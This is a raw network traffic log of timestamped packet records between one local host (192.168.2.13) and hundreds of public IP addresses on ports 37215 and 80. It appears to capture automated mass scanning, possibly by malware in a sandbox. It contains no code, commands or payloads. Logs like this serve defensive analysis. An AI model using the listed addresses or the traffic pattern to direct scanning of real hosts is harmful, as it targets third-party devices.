                            Jun 10, 2024 15:37:58.469832897 CEST372153040141.62.237.163192.168.2.13
                            Jun 10, 2024 15:37:58.469837904 CEST1683380192.168.2.1378.199.201.121
                            Jun 10, 2024 15:37:58.469845057 CEST3040137215192.168.2.13197.104.66.200
                            Jun 10, 2024 15:37:58.469846010 CEST372153040141.29.83.119192.168.2.13
                            Jun 10, 2024 15:37:58.469851017 CEST1683380192.168.2.13111.31.234.213
                            Jun 10, 2024 15:37:58.469855070 CEST3040137215192.168.2.1341.77.126.220
                            Jun 10, 2024 15:37:58.469858885 CEST3721530401156.67.39.138192.168.2.13
                            Jun 10, 2024 15:37:58.469871044 CEST8016833145.193.92.118192.168.2.13
                            Jun 10, 2024 15:37:58.469877005 CEST3040137215192.168.2.1341.62.237.163
                            Jun 10, 2024 15:37:58.469881058 CEST3040137215192.168.2.1341.29.83.119
                            Jun 10, 2024 15:37:58.469883919 CEST372153040141.119.15.3192.168.2.13
                            Jun 10, 2024 15:37:58.469897032 CEST3721530401156.111.65.226192.168.2.13
                            Jun 10, 2024 15:37:58.469897985 CEST3040137215192.168.2.13156.67.39.138
                            Jun 10, 2024 15:37:58.469912052 CEST3721530401197.194.19.10192.168.2.13
                            Jun 10, 2024 15:37:58.469914913 CEST1683380192.168.2.13145.193.92.118
                            Jun 10, 2024 15:37:58.469918966 CEST3040137215192.168.2.1341.119.15.3
                            Jun 10, 2024 15:37:58.469928026 CEST372153040141.41.124.55192.168.2.13
                            Jun 10, 2024 15:37:58.469942093 CEST3721530401197.154.100.53192.168.2.13
                            Jun 10, 2024 15:37:58.469948053 CEST3040137215192.168.2.13156.111.65.226
                            Jun 10, 2024 15:37:58.469948053 CEST3040137215192.168.2.13197.194.19.10
                            Jun 10, 2024 15:37:58.469954014 CEST372153040141.163.61.71192.168.2.13
                            Jun 10, 2024 15:37:58.469959021 CEST3040137215192.168.2.1341.41.124.55
                            Jun 10, 2024 15:37:58.469968081 CEST3721530401156.224.63.34192.168.2.13
                            Jun 10, 2024 15:37:58.469973087 CEST3040137215192.168.2.13197.154.100.53
                            Jun 10, 2024 15:37:58.469980955 CEST372153040141.27.60.158192.168.2.13
                            Jun 10, 2024 15:37:58.469986916 CEST3040137215192.168.2.1341.163.61.71
                            Jun 10, 2024 15:37:58.469993114 CEST372153040141.5.141.78192.168.2.13
                            Jun 10, 2024 15:37:58.470005989 CEST372153040141.35.30.186192.168.2.13
                            Jun 10, 2024 15:37:58.470009089 CEST3040137215192.168.2.13156.224.63.34
                            Jun 10, 2024 15:37:58.470010996 CEST3040137215192.168.2.1341.27.60.158
                            Jun 10, 2024 15:37:58.470017910 CEST3721530401156.184.221.6192.168.2.13
                            Jun 10, 2024 15:37:58.470030069 CEST3040137215192.168.2.1341.5.141.78
                            Jun 10, 2024 15:37:58.470030069 CEST3040137215192.168.2.1341.35.30.186
                            Jun 10, 2024 15:37:58.470031023 CEST372153040141.20.9.54192.168.2.13
                            Jun 10, 2024 15:37:58.470043898 CEST3721530401156.143.57.24192.168.2.13
                            Jun 10, 2024 15:37:58.470053911 CEST3040137215192.168.2.13156.184.221.6
                            Jun 10, 2024 15:37:58.470056057 CEST8016833161.147.107.200192.168.2.13
                            Jun 10, 2024 15:37:58.470067978 CEST3721530401156.211.61.223192.168.2.13
                            Jun 10, 2024 15:37:58.470081091 CEST3721530401197.159.104.223192.168.2.13
                            Jun 10, 2024 15:37:58.470082998 CEST3040137215192.168.2.1341.20.9.54
                            Jun 10, 2024 15:37:58.470082998 CEST3040137215192.168.2.13156.143.57.24
                            Jun 10, 2024 15:37:58.470093012 CEST1683380192.168.2.13161.147.107.200
                            Jun 10, 2024 15:37:58.470093966 CEST3721530401156.60.134.82192.168.2.13
                            Jun 10, 2024 15:37:58.470105886 CEST8016833189.244.26.215192.168.2.13
                            Jun 10, 2024 15:37:58.470108032 CEST3040137215192.168.2.13156.211.61.223
                            Jun 10, 2024 15:37:58.470118999 CEST3721530401197.66.41.3192.168.2.13
                            Jun 10, 2024 15:37:58.470132113 CEST3721530401156.193.159.157192.168.2.13
                            Jun 10, 2024 15:37:58.470135927 CEST3040137215192.168.2.13197.159.104.223
                            Jun 10, 2024 15:37:58.470136881 CEST3040137215192.168.2.13156.60.134.82
                            Jun 10, 2024 15:37:58.470144987 CEST1683380192.168.2.13189.244.26.215
                            Jun 10, 2024 15:37:58.470161915 CEST3040137215192.168.2.13156.193.159.157
                            Jun 10, 2024 15:37:58.470164061 CEST3040137215192.168.2.13197.66.41.3
                            Jun 10, 2024 15:37:58.472434998 CEST3721530401156.10.180.100192.168.2.13
                            Jun 10, 2024 15:37:58.472453117 CEST801683317.120.58.139192.168.2.13
                            Jun 10, 2024 15:37:58.472465038 CEST8016833206.246.142.180192.168.2.13
                            Jun 10, 2024 15:37:58.472475052 CEST3040137215192.168.2.13156.10.180.100
                            Jun 10, 2024 15:37:58.472477913 CEST372153040141.196.240.81192.168.2.13
                            Jun 10, 2024 15:37:58.472500086 CEST3721530401156.234.94.140192.168.2.13
                            Jun 10, 2024 15:37:58.472501993 CEST1683380192.168.2.1317.120.58.139
                            Jun 10, 2024 15:37:58.472512007 CEST3721530401197.140.96.112192.168.2.13
                            Jun 10, 2024 15:37:58.472513914 CEST1683380192.168.2.13206.246.142.180
                            Jun 10, 2024 15:37:58.472523928 CEST3040137215192.168.2.1341.196.240.81
                            Jun 10, 2024 15:37:58.472526073 CEST372153040141.45.206.66192.168.2.13
                            Jun 10, 2024 15:37:58.472537041 CEST3040137215192.168.2.13156.234.94.140
                            Jun 10, 2024 15:37:58.472538948 CEST801683341.79.68.203192.168.2.13
                            Jun 10, 2024 15:37:58.472547054 CEST3040137215192.168.2.13197.140.96.112
                            Jun 10, 2024 15:37:58.472552061 CEST372153040141.62.206.70192.168.2.13
                            Jun 10, 2024 15:37:58.472564936 CEST3721530401197.173.122.45192.168.2.13
                            Jun 10, 2024 15:37:58.472565889 CEST3040137215192.168.2.1341.45.206.66
                            Jun 10, 2024 15:37:58.472565889 CEST1683380192.168.2.1341.79.68.203
                            Jun 10, 2024 15:37:58.472578049 CEST372153040141.136.243.130192.168.2.13
                            Jun 10, 2024 15:37:58.472584009 CEST3040137215192.168.2.1341.62.206.70
                            Jun 10, 2024 15:37:58.472592115 CEST3721530401197.223.92.93192.168.2.13
                            Jun 10, 2024 15:37:58.472599030 CEST3040137215192.168.2.13197.173.122.45
                            Jun 10, 2024 15:37:58.472605944 CEST3721530401156.29.101.233192.168.2.13
                            Jun 10, 2024 15:37:58.472610950 CEST3040137215192.168.2.1341.136.243.130
                            Jun 10, 2024 15:37:58.472619057 CEST372153040141.93.65.218192.168.2.13
                            Jun 10, 2024 15:37:58.472628117 CEST3040137215192.168.2.13197.223.92.93
                            Jun 10, 2024 15:37:58.472630978 CEST8016833133.151.118.131192.168.2.13
                            Jun 10, 2024 15:37:58.472644091 CEST3721530401197.102.90.128192.168.2.13
                            Jun 10, 2024 15:37:58.472656012 CEST3040137215192.168.2.13156.29.101.233
                            Jun 10, 2024 15:37:58.472657919 CEST3721530401197.125.251.86192.168.2.13
                            Jun 10, 2024 15:37:58.472666025 CEST3040137215192.168.2.1341.93.65.218
                            Jun 10, 2024 15:37:58.472666025 CEST1683380192.168.2.13133.151.118.131
                            Jun 10, 2024 15:37:58.472671032 CEST372153040141.200.225.136192.168.2.13
                            Jun 10, 2024 15:37:58.472678900 CEST3040137215192.168.2.13197.102.90.128
                            Jun 10, 2024 15:37:58.472682953 CEST3721530401197.207.163.222192.168.2.13
                            Jun 10, 2024 15:37:58.472686052 CEST3040137215192.168.2.13197.125.251.86
                            Jun 10, 2024 15:37:58.472696066 CEST372153040141.103.142.240192.168.2.13
                            Jun 10, 2024 15:37:58.472702026 CEST3040137215192.168.2.1341.200.225.136
                            Jun 10, 2024 15:37:58.472708941 CEST3721530401197.30.131.35192.168.2.13
                            Jun 10, 2024 15:37:58.472714901 CEST3040137215192.168.2.13197.207.163.222
                            Jun 10, 2024 15:37:58.472721100 CEST8016833100.207.105.157192.168.2.13
                            Jun 10, 2024 15:37:58.472733974 CEST8016833139.132.181.96192.168.2.13
                            Jun 10, 2024 15:37:58.472745895 CEST3040137215192.168.2.13197.30.131.35
                            Jun 10, 2024 15:37:58.472747087 CEST3721530401197.110.69.251192.168.2.13
                            Jun 10, 2024 15:37:58.472755909 CEST3040137215192.168.2.1341.103.142.240
                            Jun 10, 2024 15:37:58.472755909 CEST1683380192.168.2.13100.207.105.157
                            Jun 10, 2024 15:37:58.472763062 CEST3721530401197.8.238.78192.168.2.13
                            Jun 10, 2024 15:37:58.472767115 CEST1683380192.168.2.13139.132.181.96
                            Jun 10, 2024 15:37:58.472775936 CEST8016833177.26.140.40192.168.2.13
                            Jun 10, 2024 15:37:58.472779036 CEST3040137215192.168.2.13197.110.69.251
                            Jun 10, 2024 15:37:58.472789049 CEST3721530401156.28.59.39192.168.2.13
                            Jun 10, 2024 15:37:58.472793102 CEST3040137215192.168.2.13197.8.238.78
                            Jun 10, 2024 15:37:58.472801924 CEST3721530401197.89.36.101192.168.2.13
                            Jun 10, 2024 15:37:58.472809076 CEST1683380192.168.2.13177.26.140.40
                            Jun 10, 2024 15:37:58.472814083 CEST8016833149.252.83.244192.168.2.13
                            Jun 10, 2024 15:37:58.472826004 CEST3040137215192.168.2.13156.28.59.39
                            Jun 10, 2024 15:37:58.472827911 CEST801683396.217.172.101192.168.2.13
                            Jun 10, 2024 15:37:58.472841978 CEST372153040141.158.211.230192.168.2.13
                            Jun 10, 2024 15:37:58.472842932 CEST3040137215192.168.2.13197.89.36.101
                            Jun 10, 2024 15:37:58.472855091 CEST3721530401197.230.186.51192.168.2.13
                            Jun 10, 2024 15:37:58.472861052 CEST1683380192.168.2.13149.252.83.244
                            Jun 10, 2024 15:37:58.472861052 CEST1683380192.168.2.1396.217.172.101
                            Jun 10, 2024 15:37:58.472867966 CEST8016833155.123.113.46192.168.2.13
                            Jun 10, 2024 15:37:58.472873926 CEST3040137215192.168.2.1341.158.211.230
                            Jun 10, 2024 15:37:58.472881079 CEST3721530401197.28.140.194192.168.2.13
                            Jun 10, 2024 15:37:58.472893953 CEST801683380.99.189.225192.168.2.13
                            Jun 10, 2024 15:37:58.472903967 CEST3040137215192.168.2.13197.230.186.51
                            Jun 10, 2024 15:37:58.472906113 CEST372153040141.116.133.2192.168.2.13
                            Jun 10, 2024 15:37:58.472907066 CEST1683380192.168.2.13155.123.113.46
                            Jun 10, 2024 15:37:58.472918987 CEST372153040141.58.43.68192.168.2.13
                            Jun 10, 2024 15:37:58.472920895 CEST1683380192.168.2.1380.99.189.225
                            Jun 10, 2024 15:37:58.472922087 CEST3040137215192.168.2.13197.28.140.194
                            Jun 10, 2024 15:37:58.472933054 CEST8016833148.202.194.199192.168.2.13
                            Jun 10, 2024 15:37:58.472940922 CEST3040137215192.168.2.1341.116.133.2
                            Jun 10, 2024 15:37:58.472945929 CEST3721530401197.100.232.47192.168.2.13
                            Jun 10, 2024 15:37:58.472959042 CEST3721530401197.173.6.81192.168.2.13
                            Jun 10, 2024 15:37:58.472965002 CEST3040137215192.168.2.1341.58.43.68
                            Jun 10, 2024 15:37:58.472965002 CEST1683380192.168.2.13148.202.194.199
                            Jun 10, 2024 15:37:58.472971916 CEST8016833162.156.26.34192.168.2.13
                            Jun 10, 2024 15:37:58.472980022 CEST3040137215192.168.2.13197.100.232.47
                            Jun 10, 2024 15:37:58.472999096 CEST3040137215192.168.2.13197.173.6.81
                            Jun 10, 2024 15:37:58.473005056 CEST1683380192.168.2.13162.156.26.34
                            Jun 10, 2024 15:37:58.474380016 CEST3721530401156.161.209.230192.168.2.13
                            Jun 10, 2024 15:37:58.474396944 CEST8016833155.63.203.50192.168.2.13
                            Jun 10, 2024 15:37:58.474409103 CEST8016833184.103.204.143192.168.2.13
                            Jun 10, 2024 15:37:58.474422932 CEST372153040141.111.74.7192.168.2.13
                            Jun 10, 2024 15:37:58.474430084 CEST3040137215192.168.2.13156.161.209.230
                            Jun 10, 2024 15:37:58.474435091 CEST372153040141.160.121.85192.168.2.13
                            Jun 10, 2024 15:37:58.474430084 CEST1683380192.168.2.13155.63.203.50
                            Jun 10, 2024 15:37:58.474447966 CEST372153040141.158.24.145192.168.2.13
                            Jun 10, 2024 15:37:58.474459887 CEST3721530401156.177.48.90192.168.2.13
                            Jun 10, 2024 15:37:58.474462032 CEST3040137215192.168.2.1341.160.121.85
                            Jun 10, 2024 15:37:58.474469900 CEST3040137215192.168.2.1341.111.74.7
                            Jun 10, 2024 15:37:58.474473953 CEST372153040141.1.38.160192.168.2.13
                            Jun 10, 2024 15:37:58.474479914 CEST3040137215192.168.2.1341.158.24.145
                            Jun 10, 2024 15:37:58.474488020 CEST372153040141.168.195.48192.168.2.13
                            Jun 10, 2024 15:37:58.474489927 CEST3040137215192.168.2.13156.177.48.90
                            Jun 10, 2024 15:37:58.474499941 CEST8016833100.250.217.104192.168.2.13
                            Jun 10, 2024 15:37:58.474513054 CEST3721530401156.26.118.105192.168.2.13
                            Jun 10, 2024 15:37:58.474524975 CEST3721530401197.131.228.194192.168.2.13
                            Jun 10, 2024 15:37:58.474524975 CEST1683380192.168.2.13184.103.204.143
                            Jun 10, 2024 15:37:58.474536896 CEST3040137215192.168.2.1341.168.195.48
                            Jun 10, 2024 15:37:58.474538088 CEST3721530401197.60.77.221192.168.2.13
                            Jun 10, 2024 15:37:58.474541903 CEST3040137215192.168.2.1341.1.38.160
                            Jun 10, 2024 15:37:58.474546909 CEST1683380192.168.2.13100.250.217.104
                            Jun 10, 2024 15:37:58.474546909 CEST3040137215192.168.2.13156.26.118.105
                            Jun 10, 2024 15:37:58.474553108 CEST8016833168.66.40.188192.168.2.13
                            Jun 10, 2024 15:37:58.474558115 CEST3040137215192.168.2.13197.131.228.194
                            Jun 10, 2024 15:37:58.474565983 CEST8016833204.163.167.26192.168.2.13
                            Jun 10, 2024 15:37:58.474570036 CEST3040137215192.168.2.13197.60.77.221
                            Jun 10, 2024 15:37:58.474579096 CEST801683347.202.246.151192.168.2.13
                            Jun 10, 2024 15:37:58.474586964 CEST1683380192.168.2.13168.66.40.188
                            Jun 10, 2024 15:37:58.474591970 CEST3721530401156.232.216.223192.168.2.13
                            Jun 10, 2024 15:37:58.474605083 CEST8016833207.57.86.140192.168.2.13
                            Jun 10, 2024 15:37:58.474607944 CEST1683380192.168.2.13204.163.167.26
                            Jun 10, 2024 15:37:58.474607944 CEST1683380192.168.2.1347.202.246.151
                            Jun 10, 2024 15:37:58.474617958 CEST8016833189.153.232.220192.168.2.13
                            Jun 10, 2024 15:37:58.474626064 CEST3040137215192.168.2.13156.232.216.223
                            Jun 10, 2024 15:37:58.474632025 CEST8016833183.115.20.157192.168.2.13
                            Jun 10, 2024 15:37:58.474633932 CEST1683380192.168.2.13207.57.86.140
                            Jun 10, 2024 15:37:58.474644899 CEST372153040141.244.207.155192.168.2.13
                            Jun 10, 2024 15:37:58.474651098 CEST1683380192.168.2.13189.153.232.220
                            Jun 10, 2024 15:37:58.474658012 CEST3721530401156.243.241.245192.168.2.13
                            Jun 10, 2024 15:37:58.474662066 CEST1683380192.168.2.13183.115.20.157
                            Jun 10, 2024 15:37:58.474672079 CEST8016833210.99.198.180192.168.2.13
                            Jun 10, 2024 15:37:58.474680901 CEST3040137215192.168.2.1341.244.207.155
                            Jun 10, 2024 15:37:58.474685907 CEST3721530401197.81.59.204192.168.2.13
                            Jun 10, 2024 15:37:58.474688053 CEST3040137215192.168.2.13156.243.241.245
                            Jun 10, 2024 15:37:58.474700928 CEST8016833180.252.252.121192.168.2.13
                            Jun 10, 2024 15:37:58.474701881 CEST1683380192.168.2.13210.99.198.180
                            Jun 10, 2024 15:37:58.474714041 CEST801683367.108.146.167192.168.2.13
                            Jun 10, 2024 15:37:58.474720955 CEST3040137215192.168.2.13197.81.59.204
                            Jun 10, 2024 15:37:58.474728107 CEST372153040141.36.167.226192.168.2.13
                            Jun 10, 2024 15:37:58.474737883 CEST1683380192.168.2.13180.252.252.121
                            Jun 10, 2024 15:37:58.474740028 CEST801683334.139.84.19192.168.2.13
                            Jun 10, 2024 15:37:58.474746943 CEST1683380192.168.2.1367.108.146.167
                            Jun 10, 2024 15:37:58.474752903 CEST3721530401156.86.144.126192.168.2.13
                            Jun 10, 2024 15:37:58.474766016 CEST3721530401197.13.238.227192.168.2.13
                            Jun 10, 2024 15:37:58.474771976 CEST3040137215192.168.2.1341.36.167.226
                            Jun 10, 2024 15:37:58.474771976 CEST1683380192.168.2.1334.139.84.19
                            Jun 10, 2024 15:37:58.474778891 CEST3721530401156.239.155.136192.168.2.13
                            Jun 10, 2024 15:37:58.474791050 CEST3721530401197.47.68.177192.168.2.13
                            Jun 10, 2024 15:37:58.474793911 CEST3040137215192.168.2.13156.86.144.126
                            Jun 10, 2024 15:37:58.474802971 CEST3721530401197.250.183.187192.168.2.13
                            Jun 10, 2024 15:37:58.474812031 CEST3040137215192.168.2.13197.13.238.227
                            Jun 10, 2024 15:37:58.474812984 CEST3040137215192.168.2.13156.239.155.136
                            Jun 10, 2024 15:37:58.474814892 CEST8016833204.129.56.35192.168.2.13
                            Jun 10, 2024 15:37:58.474827051 CEST3040137215192.168.2.13197.47.68.177
                            Jun 10, 2024 15:37:58.474828005 CEST3721530401197.86.50.147192.168.2.13
                            Jun 10, 2024 15:37:58.474834919 CEST3040137215192.168.2.13197.250.183.187
                            Jun 10, 2024 15:37:58.474842072 CEST372153040141.7.1.172192.168.2.13
                            Jun 10, 2024 15:37:58.474853992 CEST372153040141.53.81.129192.168.2.13
                            Jun 10, 2024 15:37:58.474858999 CEST1683380192.168.2.13204.129.56.35
                            Jun 10, 2024 15:37:58.474858999 CEST3040137215192.168.2.13197.86.50.147
                            Jun 10, 2024 15:37:58.474867105 CEST801683344.202.73.217192.168.2.13
                            Jun 10, 2024 15:37:58.474874020 CEST3040137215192.168.2.1341.7.1.172
                            Jun 10, 2024 15:37:58.474879026 CEST3721530401156.118.92.132192.168.2.13
                            Jun 10, 2024 15:37:58.474884987 CEST3040137215192.168.2.1341.53.81.129
                            Jun 10, 2024 15:37:58.474891901 CEST8016833101.25.61.73192.168.2.13
                            Jun 10, 2024 15:37:58.474903107 CEST1683380192.168.2.1344.202.73.217
                            Jun 10, 2024 15:37:58.474920988 CEST1683380192.168.2.13101.25.61.73
                            Jun 10, 2024 15:37:58.474936962 CEST3040137215192.168.2.13156.118.92.132
                            Jun 10, 2024 15:37:58.477205038 CEST3721530401197.3.246.202192.168.2.13
                            Jun 10, 2024 15:37:58.477222919 CEST8016833124.171.150.230192.168.2.13
                            Jun 10, 2024 15:37:58.477235079 CEST801683382.29.73.12192.168.2.13
                            Jun 10, 2024 15:37:58.477247953 CEST8016833140.156.150.185192.168.2.13
                            Jun 10, 2024 15:37:58.477260113 CEST8016833196.145.124.19192.168.2.13
                            Jun 10, 2024 15:37:58.477272987 CEST3721530401156.122.29.230192.168.2.13
                            Jun 10, 2024 15:37:58.477273941 CEST1683380192.168.2.13124.171.150.230
                            Jun 10, 2024 15:37:58.477283001 CEST1683380192.168.2.13140.156.150.185
                            Jun 10, 2024 15:37:58.477286100 CEST3721530401156.179.158.25192.168.2.13
                            Jun 10, 2024 15:37:58.477292061 CEST1683380192.168.2.13196.145.124.19
                            Jun 10, 2024 15:37:58.477292061 CEST3040137215192.168.2.13197.3.246.202
                            Jun 10, 2024 15:37:58.477298021 CEST372153040141.201.242.126192.168.2.13
                            Jun 10, 2024 15:37:58.477310896 CEST372153040141.80.78.157192.168.2.13
                            Jun 10, 2024 15:37:58.477324009 CEST3721530401197.202.80.75192.168.2.13
                            Jun 10, 2024 15:37:58.477335930 CEST3721530401156.87.230.141192.168.2.13
                            Jun 10, 2024 15:37:58.477348089 CEST3721530401156.101.229.133192.168.2.13
                            Jun 10, 2024 15:37:58.477348089 CEST3040137215192.168.2.1341.80.78.157
                            Jun 10, 2024 15:37:58.477360010 CEST372153040141.193.155.19192.168.2.13
                            Jun 10, 2024 15:37:58.477372885 CEST3721530401156.84.21.205192.168.2.13
                            Jun 10, 2024 15:37:58.477384090 CEST3721530401156.112.46.16192.168.2.13
                            Jun 10, 2024 15:37:58.477396965 CEST3721530401156.82.129.139192.168.2.13
                            Jun 10, 2024 15:37:58.477399111 CEST3040137215192.168.2.13156.179.158.25
                            Jun 10, 2024 15:37:58.477399111 CEST3040137215192.168.2.1341.201.242.126
                            Jun 10, 2024 15:37:58.477400064 CEST3040137215192.168.2.13156.122.29.230
                            Jun 10, 2024 15:37:58.477408886 CEST3040137215192.168.2.13156.87.230.141
                            Jun 10, 2024 15:37:58.477410078 CEST372153040141.253.98.169192.168.2.13
                            Jun 10, 2024 15:37:58.477411032 CEST3040137215192.168.2.1341.193.155.19
                            Jun 10, 2024 15:37:58.477420092 CEST3040137215192.168.2.13197.202.80.75
                            Jun 10, 2024 15:37:58.477420092 CEST3040137215192.168.2.13156.101.229.133
                            Jun 10, 2024 15:37:58.477422953 CEST3721530401197.171.80.233192.168.2.13
                            Jun 10, 2024 15:37:58.477430105 CEST1683380192.168.2.1382.29.73.12
                            Jun 10, 2024 15:37:58.477436066 CEST3721530401197.183.130.132192.168.2.13
                            Jun 10, 2024 15:37:58.477449894 CEST3721530401197.28.46.68192.168.2.13
                            Jun 10, 2024 15:37:58.477462053 CEST3721530401156.197.132.147192.168.2.13
                            Jun 10, 2024 15:37:58.477474928 CEST3721530401197.174.51.18192.168.2.13
                            Jun 10, 2024 15:37:58.477487087 CEST3040137215192.168.2.13156.84.21.205
                            Jun 10, 2024 15:37:58.477487087 CEST3721530401156.254.247.111192.168.2.13
                            Jun 10, 2024 15:37:58.477488041 CEST3040137215192.168.2.1341.253.98.169
                            Jun 10, 2024 15:37:58.477493048 CEST3040137215192.168.2.13156.112.46.16
                            Jun 10, 2024 15:37:58.477499962 CEST3040137215192.168.2.13156.82.129.139
                            Jun 10, 2024 15:37:58.477499962 CEST3040137215192.168.2.13197.183.130.132
                            Jun 10, 2024 15:37:58.477502108 CEST3721530401197.125.140.84192.168.2.13
                            Jun 10, 2024 15:37:58.477518082 CEST3721530401197.240.183.237192.168.2.13
                            Jun 10, 2024 15:37:58.477530956 CEST8016833182.55.5.228192.168.2.13
                            Jun 10, 2024 15:37:58.477541924 CEST3721530401197.72.76.209192.168.2.13
                            Jun 10, 2024 15:37:58.477555037 CEST372153040141.126.209.110192.168.2.13
                            Jun 10, 2024 15:37:58.477556944 CEST3040137215192.168.2.13197.28.46.68
                            Jun 10, 2024 15:37:58.477561951 CEST3040137215192.168.2.13156.197.132.147
                            Jun 10, 2024 15:37:58.477562904 CEST3040137215192.168.2.13197.171.80.233
                            Jun 10, 2024 15:37:58.477566957 CEST3721530401197.11.6.177192.168.2.13
                            Jun 10, 2024 15:37:58.477580070 CEST3040137215192.168.2.13197.174.51.18
                            Jun 10, 2024 15:37:58.477581024 CEST372153040141.250.234.243192.168.2.13
                            Jun 10, 2024 15:37:58.477580070 CEST3040137215192.168.2.13197.125.140.84
                            Jun 10, 2024 15:37:58.477583885 CEST1683380192.168.2.13182.55.5.228
                            Jun 10, 2024 15:37:58.477585077 CEST3040137215192.168.2.13156.254.247.111
                            Jun 10, 2024 15:37:58.477585077 CEST3040137215192.168.2.13197.240.183.237
                            Jun 10, 2024 15:37:58.477583885 CEST3040137215192.168.2.13197.72.76.209
                            Jun 10, 2024 15:37:58.477593899 CEST8016833141.116.32.240192.168.2.13
                            Jun 10, 2024 15:37:58.477607965 CEST3721530401156.180.142.166192.168.2.13
                            Jun 10, 2024 15:37:58.477619886 CEST3721530401156.30.139.237192.168.2.13
                            Jun 10, 2024 15:37:58.477632046 CEST3721530401156.5.128.132192.168.2.13
                            Jun 10, 2024 15:37:58.477643967 CEST801683348.246.69.223192.168.2.13
                            Jun 10, 2024 15:37:58.477650881 CEST3040137215192.168.2.1341.126.209.110
                            Jun 10, 2024 15:37:58.477655888 CEST8016833106.29.247.21192.168.2.13
                            Jun 10, 2024 15:37:58.477658033 CEST1683380192.168.2.13141.116.32.240
                            Jun 10, 2024 15:37:58.477659941 CEST3040137215192.168.2.13197.11.6.177
                            Jun 10, 2024 15:37:58.477663994 CEST3040137215192.168.2.1341.250.234.243
                            Jun 10, 2024 15:37:58.477669954 CEST372153040141.184.51.183192.168.2.13
                            Jun 10, 2024 15:37:58.477683067 CEST801683325.214.7.36192.168.2.13
                            Jun 10, 2024 15:37:58.477694988 CEST3721530401197.159.169.105192.168.2.13
                            Jun 10, 2024 15:37:58.477708101 CEST3721530401156.4.150.72192.168.2.13
                            Jun 10, 2024 15:37:58.477720022 CEST3040137215192.168.2.13156.30.139.237
                            Jun 10, 2024 15:37:58.477720022 CEST372153040141.116.155.141192.168.2.13
                            Jun 10, 2024 15:37:58.477720976 CEST3040137215192.168.2.13156.180.142.166
                            Jun 10, 2024 15:37:58.477729082 CEST1683380192.168.2.1325.214.7.36
                            Jun 10, 2024 15:37:58.477740049 CEST1683380192.168.2.13106.29.247.21
                            Jun 10, 2024 15:37:58.477741957 CEST3040137215192.168.2.13156.5.128.132
                            Jun 10, 2024 15:37:58.477741957 CEST1683380192.168.2.1348.246.69.223
                            Jun 10, 2024 15:37:58.477781057 CEST3040137215192.168.2.1341.184.51.183
                            Jun 10, 2024 15:37:58.477793932 CEST3040137215192.168.2.13197.159.169.105
                            Jun 10, 2024 15:37:58.477797985 CEST3040137215192.168.2.13156.4.150.72
                            Jun 10, 2024 15:37:58.477858067 CEST3040137215192.168.2.1341.116.155.141
                            Jun 10, 2024 15:37:58.479171991 CEST3721530401197.37.21.3192.168.2.13
                            Jun 10, 2024 15:37:58.479188919 CEST8016833150.149.210.64192.168.2.13
                            Jun 10, 2024 15:37:58.479202032 CEST3721530401156.253.141.133192.168.2.13
                            Jun 10, 2024 15:37:58.479214907 CEST372153040141.25.49.153192.168.2.13
                            Jun 10, 2024 15:37:58.479228020 CEST372153040141.104.213.101192.168.2.13
                            Jun 10, 2024 15:37:58.479240894 CEST3721530401156.12.217.211192.168.2.13
                            Jun 10, 2024 15:37:58.479253054 CEST801683389.5.191.31192.168.2.13
                            Jun 10, 2024 15:37:58.479253054 CEST3040137215192.168.2.13197.37.21.3
                            Jun 10, 2024 15:37:58.479257107 CEST3040137215192.168.2.13156.253.141.133
                            Jun 10, 2024 15:37:58.479257107 CEST3040137215192.168.2.1341.25.49.153
                            Jun 10, 2024 15:37:58.479265928 CEST372153040141.178.187.242192.168.2.13
                            Jun 10, 2024 15:37:58.479279041 CEST3721530401156.213.78.215192.168.2.13
                            Jun 10, 2024 15:37:58.479283094 CEST3040137215192.168.2.13156.12.217.211
                            Jun 10, 2024 15:37:58.479285955 CEST3040137215192.168.2.1341.104.213.101
                            Jun 10, 2024 15:37:58.479290962 CEST8016833143.28.155.62192.168.2.13
                            Jun 10, 2024 15:37:58.479304075 CEST8016833123.81.102.171192.168.2.13
                            Jun 10, 2024 15:37:58.479315996 CEST3721530401156.11.223.48192.168.2.13
                            Jun 10, 2024 15:37:58.479329109 CEST8016833217.140.220.168192.168.2.13
                            Jun 10, 2024 15:37:58.479332924 CEST1683380192.168.2.1389.5.191.31
                            Jun 10, 2024 15:37:58.479332924 CEST3040137215192.168.2.13156.213.78.215
                            Jun 10, 2024 15:37:58.479334116 CEST1683380192.168.2.13143.28.155.62
                            Jun 10, 2024 15:37:58.479341984 CEST372153040141.74.206.133192.168.2.13
                            Jun 10, 2024 15:37:58.479351997 CEST1683380192.168.2.13150.149.210.64
                            Jun 10, 2024 15:37:58.479353905 CEST372153040141.62.199.115192.168.2.13
                            Jun 10, 2024 15:37:58.479367018 CEST372153040141.70.221.1192.168.2.13
                            Jun 10, 2024 15:37:58.479378939 CEST801683347.5.123.175192.168.2.13
                            Jun 10, 2024 15:37:58.479381084 CEST3040137215192.168.2.1341.178.187.242
                            Jun 10, 2024 15:37:58.479392052 CEST3721530401197.218.28.17192.168.2.13
                            Jun 10, 2024 15:37:58.479404926 CEST8016833123.248.213.63192.168.2.13
                            Jun 10, 2024 15:37:58.479408026 CEST1683380192.168.2.13217.140.220.168
                            Jun 10, 2024 15:37:58.479408026 CEST3040137215192.168.2.1341.70.221.1
                            Jun 10, 2024 15:37:58.479410887 CEST1683380192.168.2.13123.81.102.171
                            Jun 10, 2024 15:37:58.479410887 CEST3040137215192.168.2.13156.11.223.48
                            Jun 10, 2024 15:37:58.479418039 CEST80168331.35.33.240192.168.2.13
                            Jun 10, 2024 15:37:58.479429960 CEST372153040141.109.189.68192.168.2.13
                            Jun 10, 2024 15:37:58.479440928 CEST372153040141.78.69.134192.168.2.13
                            Jun 10, 2024 15:37:58.479453087 CEST3721530401156.97.62.235192.168.2.13
                            Jun 10, 2024 15:37:58.479454994 CEST3040137215192.168.2.1341.74.206.133
                            Jun 10, 2024 15:37:58.479463100 CEST1683380192.168.2.1347.5.123.175
                            Jun 10, 2024 15:37:58.479463100 CEST3040137215192.168.2.13197.218.28.17
                            Jun 10, 2024 15:37:58.479465961 CEST801683397.198.1.8192.168.2.13
                            Jun 10, 2024 15:37:58.479470968 CEST3040137215192.168.2.1341.109.189.68
                            Jun 10, 2024 15:37:58.479471922 CEST3040137215192.168.2.1341.78.69.134
                            Jun 10, 2024 15:37:58.479473114 CEST3040137215192.168.2.1341.62.199.115
                            Jun 10, 2024 15:37:58.479480982 CEST372153040141.140.76.152192.168.2.13
                            Jun 10, 2024 15:37:58.479495049 CEST8016833110.126.158.141192.168.2.13
                            Jun 10, 2024 15:37:58.479507923 CEST3721530401156.43.175.240192.168.2.13
                            Jun 10, 2024 15:37:58.479520082 CEST8016833175.100.24.56192.168.2.13
